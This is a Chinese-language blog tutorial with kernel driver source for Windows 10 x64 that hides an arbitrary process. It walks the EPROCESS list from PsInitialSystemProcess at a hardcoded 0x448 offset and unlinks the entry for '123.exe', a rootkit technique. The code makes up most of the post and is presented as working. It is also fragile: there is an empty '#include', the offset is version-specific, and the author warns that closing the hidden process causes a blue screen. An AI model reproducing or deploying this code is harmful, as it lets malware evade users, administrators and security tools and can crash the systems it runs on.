windows10驱动 x64--- 驱动实现隐藏任意进程（四）

了解原理

流程：PsInitialSystemProcess(进程HeadList) —>给出进程名—>0环实现进程隐藏

驱动层代码—0环

#include "ntifs.h"
#include

//extern PEPROCESS PsInitialSystemProcess;
NTSTATUS DriverUnload(PDRIVER_OBJECT DriverObject)
{
	DbgPrint("Driver Exit \r\n");
	return STATUS_SUCCESS;

}

UCHAR* PsGetProcessImageFileName(PEPROCESS Process);
PEPROCESS ProcessObject;

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING Regedit)
{
	

	//遍历进程
	PUCHAR szProcessName = PsGetProcessImageFileName(PsInitialSystemProcess);

	PLIST_ENTRY BmpList = { 0 };
	BmpList = (PLIST_ENTRY)(((PUCHAR)PsInitialSystemProcess + 0x448));
	BOOLEAN bmp = FALSE;
	
	DbgPrint("szProcessName %s\n", szProcessName);
	for (;;)
	{
		
		BmpList = BmpList->Flink;
		szProcessName = PsGetProcessImageFileName((PEPROCESS)((PUCHAR)BmpList -0x448));
		DbgPrint("szProcessName %s\n", szProcessName);
		if (strcmp(szProcessName, "") == 0)
		{
			bmp = TRUE;
			return STATUS_SUCCESS;
		}

		if (strcmp(szProcessName, "123.exe") == 0)
		{
			//DbgPrint("找到了");
			break;
		}

	}
	//隐藏进程
	BmpList->Flink->Blink = BmpList->Blink;
	BmpList->Blink->Flink = BmpList->Flink;

	DriverObject->DriverUnload = DriverUnload;
	return STATUS_SUCCESS;
}

测试截图

加载驱动前：

加载驱动后：

隐藏了进程123.exe

注意：如果此时直接关闭隐藏进程会导致蓝屏。